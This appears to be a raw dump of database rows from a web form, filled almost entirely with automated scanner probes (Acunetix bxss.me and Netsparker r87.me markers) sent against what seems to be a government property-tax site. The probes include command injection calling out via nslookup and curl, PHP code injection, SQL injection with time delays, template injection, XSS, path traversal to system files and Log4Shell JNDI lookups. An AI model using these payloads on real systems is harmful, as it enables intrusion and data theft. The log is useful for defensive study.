3405 pHqghUme &(nslookup${IFS}-q${IFS}cname${IFS}hitltrnydzdzz886d8.bxss.me||curl${IFS}hitltrnydzdzz886d8.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitltrnydzdzz886d8.bxss.me||curl${IFS}hitltrnydzdzz886d8.bxss.me)&`'
3406 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg 555
3407 ./pHqghUme 555
3408 Http://bxss.me/t/fit.txt 555
3409 echo ibpmyc$()\ jteggx\nz^xyu||a #' &echo ibpmyc$()\ jteggx\nz^xyu||a #|" &echo ibpmyc$()\ jteggx\nz 555
3410 pHqghUme 555'||sleep(27*1000)*nzkjyq||'
3411 http://bxss.me/t/fit.txt?.jpg 555
3412 pHqghUme '.gethostbyname(lc('hitac'.'axefoovfb8865.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(86).chr(121).chr(65).'
3413 &echo agkzea$()\ qjlyot\nz^xyu||a #' &echo agkzea$()\ qjlyot\nz^xyu||a #|" &echo agkzea$()\ qjlyot\n 555
3414 pHqghUme 555"||sleep(27*1000)*liappf||"
3415 pHqghUme ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
3416 pHqghUme ".gethostbyname(lc("hitqe"."prpvzokc0d44a.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(84).chr(117).chr(66)."
3417 555
3418 /etc/shells 555
3419 pHqghUme ';print(md5(31337));$a='
3420 pHqghUme 555
3421 pHqghUme 555
3422 ../../../../../../../../../../../../../../etc/shells 555
3423 pHqghUme ";print(md5(31337));$a="
3424 pHqghUme gethostbyname(lc('hitzv'.'rszskulrfe849.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(80).chr(97).chr(86)
3425 pHqghUme&echo hbwvmo$()\ dxzgxc\nz^xyu||a #' &echo hbwvmo$()\ dxzgxc\nz^xyu||a #|" &echo hbwvmo$()\ 555
3426 pHqghUme 555
3427 pHqghUme ${@print(md5(31337))}
3428 c:/windows/win.ini 555
3429 555
3430 '.gethostbyname(lc('hitim'.'azkpjfxe8f24f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(87).ch 555
3431 |echo pbgnum$()\ ykuhot\nz^xyu||a #' |echo pbgnum$()\ ykuhot\nz^xyu||a #|" |echo pbgnum$()\ ykuhot\n 555
3432 pHqghUme ${@print(md5(31337))}\
3433 '"() 555
3434 bxss.me 555
3435 ".gethostbyname(lc("hitdg"."dkeiyaem89196.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(83).ch 555
3436 pHqghUme|echo aliqos$()\ wriqfh\nz^xyu||a #' |echo aliqos$()\ wriqfh\nz^xyu||a #|" |echo aliqos$()\ 555
3437 pHqghUme '.print(md5(31337)).'
3438 gethostbyname(lc('hitcm'.'eaxyqseq4be5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(72).chr(1 555
3439 (nslookup -q=cname hitknromngwmb490b5.bxss.me||curl hitknromngwmb490b5.bxss.me)) 555
3440 ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 555
3441 $(nslookup -q=cname hituhxsyzciix4783d.bxss.me||curl hituhxsyzciix4783d.bxss.me) 555
3442 pHqghUme'&&sleep(27*1000)*kcmiyi&&' 555
3443 pHqghUme HttP://bxss.me/t/xss.html?%00
3444 ';print(md5(31337));$a=' 555
3445 pHqghUme"&&sleep(27*1000)*esaruf&&" 555
3446 &nslookup -q=cname hitqjgmkpcgnmef70a.bxss.me&'\"`0&nslookup -q=cname hitqjgmkpcgnmef70a.bxss.me&`' 555
3447 pHqghUme'||sleep(27*1000)*tgbuxh||' 555
3448 ";print(md5(31337));$a=" 555
3449 pHqghUme"||sleep(27*1000)*wjfpll||" 555
3450 pHqghUme bxss.me/t/xss.html?%00
3451 &(nslookup -q=cname hitkihtavwefw66073.bxss.me||curl hitkihtavwefw66073.bxss.me)&'\"`0&(nslookup -q= 555
3452 ${@print(md5(31337))} 555
3453 |(nslookup -q=cname hitfeesofbawufc507.bxss.me||curl hitfeesofbawufc507.bxss.me) 555
3454 ${@print(md5(31337))}\ 555
3455 pHqghUme 555
3456 pHqghUme "+"A".concat(70-3).concat(22*4).concat(122).concat(66).concat(111).concat(84)+(require"socket" Socket.gethostbyname("hitve"+"slgwysxj0c3b5.bxss.me.")[3].to_s)+"
3457 HttP://bxss.me/t/xss.html?%00 555
3458 `(nslookup -q=cname hitjavdisayrq3df37.bxss.me||curl hitjavdisayrq3df37.bxss.me)` 555
3459 '.print(md5(31337)).' 555
3460 pHqghUme 555
3461 bxss.me/t/xss.html?%00 555
3462 pHqghUme '+'A'.concat(70-3).concat(22*4).concat(117).concat(86).concat(111).concat(73)+(require'socket' Socket.gethostbyname('hitmi'+'qiybtret82fe5.bxss.me.')[3].to_s)+'
3463 ;(nslookup -q=cname hithvxsateure4650a.bxss.me||curl hithvxsateure4650a.bxss.me)|(nslookup -q=cname 555
3464 |(nslookup${IFS}-q${IFS}cname${IFS}hitzdzokxwutx9c674.bxss.me||curl${IFS}hitzdzokxwutx9c674.bxss.me) 555
3465 pHqghUme 'A'.concat(70-3).concat(22*4).concat(111).concat(85).concat(107).concat(74)+(require'socket' Socket.gethostbyname('hitiy'+'gcfeisqf8e03f.bxss.me.')[3].to_s)
3466 pHqghUme 555
3467 &(nslookup${IFS}-q${IFS}cname${IFS}hitjiqynjtganc5646.bxss.me||curl${IFS}hitjiqynjtganc5646.bxss.me) 555
3468 pHqghUme https://propertytax.jk.gov.in/
3469 "+"A".concat(70-3).concat(22*4).concat(97).concat(77).concat(109).concat(71)+(require"socket" Socket 555
3470 pHqghUme propertytax.jk.gov.in
3471 '+'A'.concat(70-3).concat(22*4).concat(117).concat(74).concat(104).concat(75)+(require'socket' Socke 555
3472 pHqghUme '"
3473 pHqghUme 555
3474 'A'.concat(70-3).concat(22*4).concat(102).concat(78).concat(115).concat(73)+(require'socket' Socket. 555
3475 pHqghUme 555
3476 https://propertytax.jk.gov.in/ 555
3477 pHqghUme 555
3478 propertytax.jk.gov.in 555
3479 '" 555
3480 pHqghUme 555
3481 pHqghUme 555
3482 pHqghUme 5559610224
3483 pHqghUme bfg4927
3484 pHqghUme 555
3485 pHqghUme bfgx7321??z1??z2a?bcxhjl7321
3486 pHqghUme <%={{={@{#{${dfb}}%>
3487 pHqghUme -1 OR 2+193-193-1=0+0+0+1 --
3488 pHqghUme -1 OR 3+193-193-1=0+0+0+1 --
3489 pHqghUme -1 OR 3*2<(0+5+193-193) --
3490 pHqghUme 555
3491 pHqghUme dfb{{98991*97996}}xca
3492 pHqghUme -1 OR 3*2>(0+5+193-193) --
3493 pHqghUme dfb{{98991*97996}}xca
3494 pHqghUme dfb{98991*97996}xca
3495 pHqghUme -1 OR 2+881-881-1=0+0+0+1
3496 pHqghUme dfb${98991*97996}xca
3497 pHqghUme -1 OR 3+881-881-1=0+0+0+1
3498 pHqghUme -1 OR 3*2<(0+5+881-881)
3499 pHqghUme dfb#{98991*97996}xca
3500 pHqghUme -1 OR 3*2>(0+5+881-881)
3501 pHqghUme dfb{#98991*97996}xca
3502 pHqghUme -1' OR 2+647-647-1=0+0+0+1 --
3503 pHqghUme -1' OR 3+647-647-1=0+0+0+1 --
3504 pHqghUme dfb{@98991*97996}xca
3505 pHqghUme dfb{{=98991*97996}}xca
3506 pHqghUme -1' OR 3*2<(0+5+647-647) --
3507 pHqghUme dfb@(98991*97996)xca
3508 pHqghUme -1' OR 3*2>(0+5+647-647) --
3509 pHqghUme dfb<%=98991*97996%>xca
3510 pHqghUme -1' OR 2+187-187-1=0+0+0+1 or 'nfQEksLi'='
3511 pHqghUme dfb#set($x=98991*97996)${x}xca
3512 pHqghUme -1' OR 3+187-187-1=0+0+0+1 or 'nfQEksLi'='
3513 pHqghUme dfb{{"abc"|title}}xca
3514 pHqghUme -1' OR 3*2<(0+5+187-187) or 'nfQEksLi'='
3515 pHqghUme print("dfb" . 98991*97996 . "xca");
3516 pHqghUme 98991*97996*98991*97996
3517 pHqghUme -1' OR 3*2>(0+5+187-187) or 'nfQEksLi'='
3518 pHqghUme dfb{@math key=98991 method="multiply" operand=97996/}xca
3519 pHqghUme -1" OR 2+111-111-1=0+0+0+1 --
3520 pHqghUme dfb{{{this}}}xca
3521 pHqghUme -1" OR 3+111-111-1=0+0+0+1 --
3522 pHqghUme #{98991*97996*98991*97996}
3523 pHqghUme -1" OR 3*2<(0+5+111-111) --
3524 pHqghUme dfb#{xca}=123
3525 pHqghUme -1" OR 3*2>(0+5+111-111) --
3526 pHqghUme dfb{{'abcd'.toUpperCase()}}xca
3527 pHqghUme AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
3528 pHqghUme dfb{{98991*97996}}xca
3529 pHqghUme dfb[[${98991*97996}]]xca
3530 pHqghUme dfb__${98991*97996}__::.x
3531 pHqghUme "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
3532 pHqghUme 555*if(now()=sysdate(),sleep(15),0)
3533 pHqghUme %35%35%35%3C%53%63%52%69%50%74%20%3E%4B%5A%52%62%289018%29%3C%2F%73%43%72%69%70%54%3E
3534 pHqghUme 555\u003CScRiPt\KZRb(9034)\u003C/sCripT\u003E
3535 pHqghUme 555<ScRiPt>KZRb(9031)</sCripT>
3536 pHqghUme 5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
3537 pHqghUme 555}body{zzz:Expre/**/SSion(KZRb(9339))}
3538 pHqghUme9137076 555
3539 pHqghUme 5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
3540 bfg5028 555
3541 bfgx6533??z1??z2a?bcxhjl6533 555
3542 <%={{={@{#{${dfb}}%> 555
3543 pHqghUme 555
3544 dfb{{98991*97996}}xca 555
3545 dfb{{98991*97996}}xca 555
3546 dfb{98991*97996}xca 555
3547 dfb${98991*97996}xca 555
3548 dfb#{98991*97996}xca 555
3549 dfb{#98991*97996}xca 555
3550 dfb{@98991*97996}xca 555
3551 dfb@(98991*97996)xca 555
3552 dfb<%=98991*97996%>xca 555
3553 dfb#set($x=98991*97996)${x}xca 555
3554 dfb{{"abc"|title}}xca 555
3555 pHqghUme (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
3556 print("dfb" . 98991*97996 . "xca"); 555
3557 98991*97996*98991*97996 555
3558 dfb{@math key=98991 method="multiply" operand=97996/}xca 555
3559 dfb{{{this}}}xca 555
3560 #{98991*97996*98991*97996} 555
3561 dfb#{xca}=123 555
3562 dfb{{'abcd'.toUpperCase()}}xca 555
3563 AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA 555
3564 dfb{{98991*97996}}xca 555
3565 dfb[[${98991*97996}]]xca 555
3566 dfb__${98991*97996}__::.x 555
3567 "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 555
3568 pHqghUme 555-1; waitfor delay '0:0:15' --
3569 %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%4B%5A%52%62%289009%29%3C%2F%73%43%72%69%70%54%3E 555
3570 pHqghUme\u003CScRiPt\KZRb(9406)\u003C/sCripT\u003E 555
3571 pHqghUme<ScRiPt>KZRb(9981)</sCripT> 555
3572 pHqghUme}body{zzz:Expre/**/SSion(KZRb(9245))} 555
3573 pHqghUme 555
3574 pHqghUme 555-1); waitfor delay '0:0:15' --
3575 pHqghUme 555
3576 pHqghUme 555-1)); waitfor delay '0:0:15' --
3577 pHqghUme 555-1 waitfor delay '0:0:15' --
3578 pHqghUme 555LMrrT4Ze'; waitfor delay '0:0:15' --
3579 pHqghUme 555Ae6t0DDj'); waitfor delay '0:0:15' --
3580 pHqghUme 555dcHrTqww')); waitfor delay '0:0:15' --
3581 pHqghUme 555-1 OR 378=(SELECT 378 FROM PG_SLEEP(15))--
3582 pHqghUme 555-1) OR 97=(SELECT 97 FROM PG_SLEEP(6))--
3583 pHqghUme 555-1)) OR 247=(SELECT 247 FROM PG_SLEEP(15))--
3584 pHqghUme 555bQIsUWlA' OR 550=(SELECT 550 FROM PG_SLEEP(15))--
3585 pHqghUme 555xgJmSiiK') OR 465=(SELECT 465 FROM PG_SLEEP(15))--
3586 pHqghUme 555VLo69UJw')) OR 311=(SELECT 311 FROM PG_SLEEP(15))--
3587 pHqghUme 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
3588 pHqghUme 555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
3589 pHqghUme 555'"
3590 pHqghUme 555????%2527%2522\'\"
3591 pHqghUme @@un208
3592 pHqghUme 555
3593 pHqghUme 555
3594 -1 OR 2+73-73-1=0+0+0+1 -- 555
3595 -1 OR 3+73-73-1=0+0+0+1 -- 555
3596 -1 OR 3*2<(0+5+73-73) -- 555
3597 -1 OR 3*2>(0+5+73-73) -- 555
3598 -1 OR 2+920-920-1=0+0+0+1 555
3599 -1 OR 3+920-920-1=0+0+0+1 555
3600 -1 OR 3*2<(0+5+920-920) 555
3601 -1 OR 3*2>(0+5+920-920) 555
3602 -1' OR 2+920-920-1=0+0+0+1 -- 555
3603 -1' OR 3+920-920-1=0+0+0+1 -- 555
3604 -1' OR 3*2<(0+5+920-920) -- 555
3605 -1' OR 3*2>(0+5+920-920) -- 555
3606 -1' OR 2+395-395-1=0+0+0+1 or 'rklXJ9RH'=' 555
3607 -1' OR 3+395-395-1=0+0+0+1 or 'rklXJ9RH'=' 555
3608 -1' OR 3*2<(0+5+395-395) or 'rklXJ9RH'=' 555
3609 -1' OR 3*2>(0+5+395-395) or 'rklXJ9RH'=' 555
3610 -1" OR 2+520-520-1=0+0+0+1 -- 555
3611 -1" OR 3+520-520-1=0+0+0+1 -- 555
3612 -1" OR 3*2<(0+5+520-520) -- 555
3613 -1" OR 3*2>(0+5+520-520) -- 555
3614 if(now()=sysdate(),sleep(15),0) 555
3615 pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z 555
3616 pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 555
3617 (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select( 555
3618 pHqghUme-1; waitfor delay '0:0:15' -- 555
3619 pHqghUme-1); waitfor delay '0:0:15' -- 555
3620 pHqghUme-1 waitfor delay '0:0:15' -- 555
3621 pHqghUmedbjzKMKT'; waitfor delay '0:0:15' -- 555
3622 pHqghUmeIy0ghRpy'); waitfor delay '0:0:15' -- 555
3623 pHqghUmePsGZNJEk')); waitfor delay '0:0:15' -- 555
3624 pHqghUmeiHubTZE3' OR 341=(SELECT 341 FROM PG_SLEEP(15))-- 555
3625 pHqghUme6uVGeLR4') OR 389=(SELECT 389 FROM PG_SLEEP(15))-- 555
3626 pHqghUme85o3Z1It')) OR 24=(SELECT 24 FROM PG_SLEEP(15))-- 555
3627 pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' 555
3628 pHqghUme'" 555
3629 pHqghUme????%2527%2522\'\" 555
3630 @@IVnOm 555
3631 pHqghUme 555
3632 pHqghUme 555
3633 pHqghUme 555
3634 pHqghUme 555
3635 pHqghUme 555
3636 pHqghUme 555
3637 pHqghUme 555
3638 pHqghUme 555
3639 pHqghUme 555
3640 pHqghUme 555
3641 pHqghUme 555
3642 pHqghUme 555
3643 pHqghUme 555
3644
3645
3646
3647
3648
3649 Smith
3650
3651 Smith
3652
3653 Smith
3654 Smith
3655
3656
3657 Smith
3658
3659 Smith
3660 Smith
3661 Smith
3662 Smith 3
3663
3664
3665
3666
3667 Smith 3
3668 Smith 3
3669 Smith 3
3670 Smith 3
3671 Smith 3
3672 Smith 3
3673
3674
3675
3676
3677 Smith
3678 Smith
3679 Smith
3680
3681
3682
3683
3684 Smith
3685
3686
3687
3688
3689
3690 Smith 3
3691
3692 Smith 3
3693
3694
3695
3696
3697
3698
3699 Smith
3700 Smith
3701
3702
3703 Smith
3704
3705 Smith
3706
3707 Smith
3708 Smith
3709 Smith
3710 Smith
3711
3712
3713
3714
3715
3716 Smith 3
3717 Smith 3
3718 Smith 3
3719 Smith 3
3720 Smith 3
3721 Smith 3
3722 Smith 3
3723 Smith 3
3724
3725 Smith 3
3726 Smith
3727
3728 Smith
3729
3730
3731
3732
3733
3734
3735
3736 Smith
3737
3738
3739 Smith
3740 Smith
3741 Smith
3742 Smith
3743 Smith
3744 Smith
3745
3746
3747 Smith 3
3748
3749
3750 Smith
3751
3752 Smith
3753 Smith
3754
3755 Smith
3756
3757
3758 Smith
3759 Smith
3760 Smith
3761 Smith
3762
3763 Smith
3764
3765 Smith
3766
3767 Smith
3768 Smith
3769
3770
3771 Smith
3772
3773 Smith
3774
3775
3776
3777
3778 Smith
3779
3780 Smith
3781
3782 Smith
3783
3784 Smith
3785
3786 Smith
3787 Smith
3788 Smith
3789 Smith
3790 Smith
3791 Smith
3792 Smith
3793 Smith
3794
3795 Smith
3796 Smith
3797 Smith
3798
3799 Smith
3800 Smith
3801
3802 Smith
3803
3804 Smith
3805 Smith
3806
3807
3808 Smith
3809 Smith
3810 Smith
3811
3812 Smith
3813 Smith
3814 Smith
3815
3816
3817 Smith
3818 Smith
3819 Smith
3820 Smith
3821
3822 Smith
3823 Smith
3824 Smith
3825
3826 Smith
3827 Smith
3828 Smith
3829 Smith
3830
3831 Smith
3832 Smith
3833 Smith
3834 Smith
3835 Smith
3836 Smith
3837
3838 Smith
3839 Smith
3840 Smith
3841
3842 Smith
3843 Smith
3844 Smith
3845 Smith
3846 Smith
3847 Smith
3848 Smith
3849 Smith
3850 Smith
3851 Smith
3852 Smith
3853 Smith
3854 Smith
3855 Smith
3856 Smith
3857
3858 Smith
3859 Smith
3860 Smith
3861 Smith
3862 Smith
3863 Smith
3864 Smith
3865 Smith
3866 -1 OR 1=1
3867 -1 OR 1=1
3868 -1 OR 1=1
3869 -1 OR 1=1
3870 ' OR 0=1 OR
3871 NS-1NO
3872
3873 Smith
3874 -1 OR 'X'='ss
3875 -1' OR 1=1 OR 'ns'='ns
3876 -1" OR 1=1 OR "ns"="ns
3877
3878 Smith
3879 -1 OR 17-7=10
3880
3881 -1 OR NS='ss
3882
3883
3884 Smith
3885
3886
3887
3888 -1' OR 1=1 OR '1'='1
3889 Smith
3890 -1' OR 1=1 OR '1'='1
3891
3892 -1" OR 1=1 OR "1"="1
3893 Smith
3894 -1" OR 1=1 OR "1"="1
3895
3896 Smith
3897
3898 -1 OR 1=1
3899 -1 OR 1=1
3900 -1 OR 1=1
3901 ' OR 0=1 OR
3902 NS-1NO
3903 -1 OR 'X'='ss
3904 -1' OR 1=1 OR 'ns'='ns
3905
3906 -1 OR 17-7=10
3907 Smith
3908 -1 OR NS='ss
3909 -1' OR 1=1 OR '1'='1
3910 -1' OR 1=1 OR '1'='1
3911 Smith
3912 -1" OR 1=1 OR "1"="1
3913 Smith
3914 -1" OR 1=1 OR "1"="1
3915
3916 Smith
3917 -1" OR 1=1 OR "ns"="ns
3918 -1 OR NS='ss
3919 Smith
3920 Smith
3921 Smith
3922 Smith
3923 Smith
3924 Smith
3925 Smith
3926
3927
3928 Smith
3929 Smith
3930 Smith
3931 Smith
3932
3933 Smith
3934
3935
3936
3937 Smith
3938
3939 Smith
3940 Smith
3941
3942
3943 Smith
3944 Smith
3945
3946 Smith
3947 Smith
3948 Smith
3949 Smith
3950 Smith
3951 Smith
3952 Smith
3953 Smith
3954 Smith
3955 Smith
3956 Smith
3957 Smith
3958 Smith
3959 Smith
3960
3961
3962 Smith
3963 Smith
3964
3965 Smith
3966 Smith
3967 Smith
3968 Smith
3969 Smith
3970 Smith
3971 Smith
3972
3973 Smith
3974 Smith
3975 Smith
3976 Smith
3977
3978 Smith
3979 Smith
3980 Smith
3981 Smith
3982 Smith
3983 Smith
3984 Smith
3985 Smith
3986 Smith
3987 Smith
3988
3989
3990 Smith
3991 Smith
3992 Smith
3993
3994 Smith
3995 Smith
3996 Smith
3997 Smith
3998 Smith
3999
4000 Smith
4001
4002
4003 Smith
4004
4005 Smith
4006 Smith
4007
4008
4009 Smith
4010
4011
4012
4013
4014 Smith
4015 Smith
4016 Smith
4017
4018 Smith
4019 Smith
4020 Smith
4021 Smith
4022 Smith
4023 Smith
4024 Smith
4025 Smith
4026 Smith
4027 Smith
4028
4029 Smith
4030 Smith
4031
4032 Smith
4033
4034 Smith
4035
4036 Smith
4037 Smith
4038
4039
4040 Smith
4041 Smith
4042 Smith
4043 Smith
4044
4045 Smith
4046 Smith
4047 Smith
4048 Smith
4049 Smith
4050
4051 Smith
4052 Smith
4053 Smith
4054 Smith
4055 Smith
4056
4057 Smith
4058 Smith
4059 Smith
4060 Smith
4061 Smith
4062 Smith
4063 Smith
4064
4065 Smith
4066 Smith
4067 Smith
4068 Smith
4069 Smith
4070 Smith
4071 Smith
4072 Smith
4073
4074 Smith
4075 Smith
4076 Smith
4077 Smith
4078 Smith
4079 Smith
4080 N3tSp4rK3R
4081
4082 Smith
4083 Smith
4084 Smith
4085
4086
4087 Smith
4088
4089
4090 ${28275*28275-(29747)}
4091 ${28275*28275-(94953)}
4092
4093 Smith
4094 Smith
4095
4096 Smith
4097 Smith
4098 Smith
4099
4100 Smith
4101 Smith
4102 Smith
4103
4104
4105 Smith
4106 Smith
4107
4108 Smith
4109
4110 Smith
4111 Smith
4112 Smith
4113 Smith
4114 Smith
4115 Smith
4116 Smith
4117 Smith
4118 Smith
4119
4120 Smith
4121
4122 Smith
4123 Smith
4124 Smith
4125 Smith
4126
4127 Smith
4128 Smith
4129 Smith
4130 Smith
4131 Smith
4132
4133 Smith
4134 Smith
4135 Smith
4136 Smith
4137 Smith
4138 -1'||'1'=='1
4139 Smith
4140 -1'||1=='1
4141 Smith
4142 Smith
4143 Smith
4144 Smith
4145 -1'||'a'=='a
4146 Smith
4147 Smith
4148 -1'||'1'=='2
4149 -1'||'N'=='3
4150 Smith
4151 '||'7892'=='7893
4152
4153 Smith
4154 Smith
4155 N3tSp4rK3R
4156 Smith
4157 '||7890=='7890
4158
4159 NS09
4160
4161 Smith
4162 '||true||'
4163
4164 Smith
4165 Smith
4166
4167 Smith
4168 Smith
4169
4170 Smith
4171
4172 NS09
4173 '||'7891'=='7891
4174
4175
4176 Smith
4177 Smith
4178
4179 Smith
4180 -1'||1=='1
4181 Smith
4182 Smith
4183 Smith
4184 -1'||'a'=='a
4185 Smith
4186 Smith
4187 -1'||'1'=='1
4188
4189 Smith
4190
4191 Smith
4192 Smith
4193 Smith
4194 Smith
4195 -1'||true||'
4196 Smith
4197 -1'||'1'=='2
4198 Smith
4199 Smith
4200 -1'||'N'=='3
4201
4202 Smith
4203 Smith
4204 '||'7892'=='7893
4205 Smith
4206 '||'7891'=='7891
4207 Smith
4208 '||7890=='7890
4209 '||true||'
4210 '||NS=='ss
4211 Smith
4212 Smith
4213 Smith
4214
4215 Smith
4216
4217 Smith
4218 Smith
4219 Smith
4220
4221 Smith
4222 Smith
4223 Smith
4224 Smith
4225 Smith
4226
4227 Smith
4228 Smith
4229 Smith
4230 Smith
4231
4232
4233 Smith
4234 Smith
4235 Smith
4236 Smith
4237 Smith
4238 Smith
4239 Smith
4240 Smith
4241 Smith
4242 Smith
4243 Smith
4244 Smith
4245 Smith
4246 Smith
4247 Smith
4248 Smith
4249 Smith
4250 Smith
4251
4252 Smith
4253 #{28275*28275-(38430)}
4254 Smith
4255 #{28275*28275-(42389)}
4256 Smith
4257 Smith
4258 Smith
4259 Smith
4260 Smith
4261 Smith
4262 Smith
4263 Smith
4264 Smith
4265 Smith
4266 Smith
4267 Smith
4268 Smith
4269 Smith
4270
4271 Smith
4272 Smith
4273 %27%22%2f%24%5b%5d.%3e
4274 Smith
4275 Smith
4276 Smith
4277 Smith
4278 Smith
4279
4280
4281 '"/$[].>
4282 Smith
4283 Smith
4284 Smith '||'a'=='a
4285 %27%22%2f%24%5b%5d.%3e
4286
4287
4288 Smith
4289
4290 Smith
4291 Smith
4292 Smith '||true||'
4293
4294 Smith '||'1'=='2
4295
4296 Smith
4297
4298
4299
4300 Smith
4301
4302
4303 Smith '||'N'=='3
4304 Smith
4305 Smith
4306
4307 Smith
4308 Smith '||'1'=='1
4309
4310
4311 Smith
4312
4313 Smith '||1=='1
4314 Smith
4315 Smith
4316 Smith '||'a'=='a
4317 Smith
4318 Smith '||true||'
4319 Smith
4320 N3tSp4rK3R
4321 Smith '||'1'=='2
4322
4323 Smith
4324 Smith '||'N'=='3
4325 Smith
4326 Smith '||'7892'=='7893
4327 Smith
4328 Smith '||7890=='7890
4329 Smith
4330 Smith '||true||'
4331 Smith
4332
4333
4334 Smith
4335
4336 Smith
4337
4338 Smith
4339
4340 Smith
4341
4342 Smith '||NS=='ss
4343 Smith
4344 Smith
4345 Smith
4346
4347 Smith
4348 Smith
4349 Smith
4350 Smith
4351
4352 Smith
4353 Smith
4354
4355 Smith
4356 Smith
4357 Smith N3tSp4rK3R
4358 Smith
4359 Smith
4360 Smith
4361 Smith
4362 Smith
4363
4364 Smith
4365 Smith
4366
4367 Smith
4368
4369
4370 Smith
4371 Smith
4372 Smith
4373 Smith
4374 Smith
4375 Smith
4376
4377 Smith
4378 Smith
4379
4380 ';sleep(25000);ns();' /* 81fcea3a-e0f3-4551-9ee1-c11f5502930c */
4381 Smith
4382
4383 Smith
4384 Smith
4385 Smith
4386 Smith
4387 Smith
4388 Smith
4389 ';sleep(1000);ns();' /* 2ae8cd33-7503-4576-9ba3-6fe0b50b619b */
4390 Smith
4391 NS09
4392 ';sleep(1000);ns();' /* 2dee31c3-da3a-4421-8ac2-645f1fb8a8e2 */
4393 Smith NS09
4394 Smith
4395 Smith
4396 Smith
4397 Smith
4398 Smith
4399 Smith
4400 Smith
4401 ${28275*28275-(14469)}
4402
4403
4404
4405 Smith
4406 Smith
4407 Smith
4408 Smith
4409 Smith
4410
4411
4412
4413
4414 Smith
4415 Smith
4416
4417 Smith
4418 Smith
4419 Smith
4420 Smith
4421 Smith
4422 Smith
4423 Smith
4424 Smith
4425 Smith
4426 Smith
4427 Smith
4428 Smith
4429 Smith ${28275*28275-(89609)}
4430 Smith
4431 ';sleep(25000);ns();' /* 9ceb8cd1-40da-4818-9bf6-8463464b84f0 */
4432
4433 Smith
4434
4435 Smith
4436 Smith
4437
4438 Smith
4439
4440
4441 Smith
4442 Smith
4443
4444 Smith
4445 Smith
4446 Smith
4447 Smith
4448 Smith
4449 Smith
4450 Smith
4451 Smith
4452
4453
4454 Smith
4455 Smith
4456 Smith
4457 Smith
4458 Smith
4459 Smith
4460
4461 Smith
4462 Smith
4463 Smith
4464 Smith
4465 Smith
4466 Smith
4467 Smith
4468 Smith
4469
4470 Smith
4471 Smith
4472 Smith
4473
4474 Smith
4475 hTTp://r87.com/n
4476 Smith
4477 Smith
4478 Smith
4479 Smith
4480 Smith
4481 Smith
4482 Smith
4483 Smith
4484 ns:netsparker056650=vuln
4485 #{28275*28275-(1306)}
4486
4487 Smith
4488
4489 Smith
4490
4491
4492
4493 %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* 6ed0ed2a-18d6-4913-800f-b2ccc3efe43c */
4494 Smith
4495 Smith
4496
4497
4498 Smith
4499
4500 hTTp://r87.com/n
4501
4502
4503 Smith
4504 Smith
4505 Smith
4506
4507 Smith
4508 %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* b945dfca-1b0c-4b67-8f42-65e2e2640468 */
4509 Smith
4510
4511
4512 Smith
4513 Smith
4514 Smith
4515 Smith
4516
4517
4518 Smith
4519 ns:netsparker056650=vuln
4520 Smith
4521 Smith
4522 Smith
4523 Smith #{28275*28275-(84393)}
4524 Smith
4525 Smith
4526 Smith
4527 http://r87.com/n?.php
4528 Smith
4529
4530 Smith
4531 Smith
4532 Smith
4533 Smith
4534 Smith
4535 Smith
4536
4537 Smith
4538
4539
4540 ${jndi:dns://tbiqvedsq6lgtsqmi5e5ggyyk2bo1lszb2hmrukid${lower:h}8.r87.me}
4541 Smith
4542 //tbiqvedsq6raoppayrpj65jrqykyu2gzb3pkoowgeuu.r87.me
4543 Smith
4544 //tbiqvedsq6zeppjhbtfdl61t8tc8vo9kwfv8z5siosa.r87.me
4545 Smith
4546 ${jndi:dns://tbiqvedsq6rbkddelxentnhpempcvppvzppate${lower:l}63qi.r87.me}
4547 tbiqvedsq6tgbhf5nz6emrczd2ebbh8_fyhrjupjchs.r87.me
4548
4549 http://r87.me/r/?id=tbiqvedsq6mwllvnb4rwpddaqgt-qf4xfi8bhhnhzwu
4550 Smith
4551
4552 Smith
4553 Smith
4554 Smith
4555 Smith
4556 Smith
4557 Smith
4558 Smith
4559 Smith
4560 http://example.com/? ns: netsparker056650=vuln
4561 Smith
4562 Smith
4563 Smith
4564 '"/$[].>
4565 Smith
4566 Smith
4567 Smith
4568 Smith
4569 Smith
4570 Smith
4571
4572 Smith
4573 Smith
4574 Smith
4575 Smith
4576
4577 Smith
4578 Smith
4579 Smith
4580 Smith
4581 Smith
4582
4583 http://r87.com/n?.php
4584 http://r87.com/n?.php
4585 Smith
4586 Smith
4587
4588 Smith
4589
4590 http://example.com/? ns: netsparker056650=vuln
4591 Smith
4592 Smith
4593
4594 Smith
4595 Smith
4596 ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://tbiqvedsq6mjzcqsjm459fx4lshpjfb${lower:g}fczxjr7lfx0.r87.me}
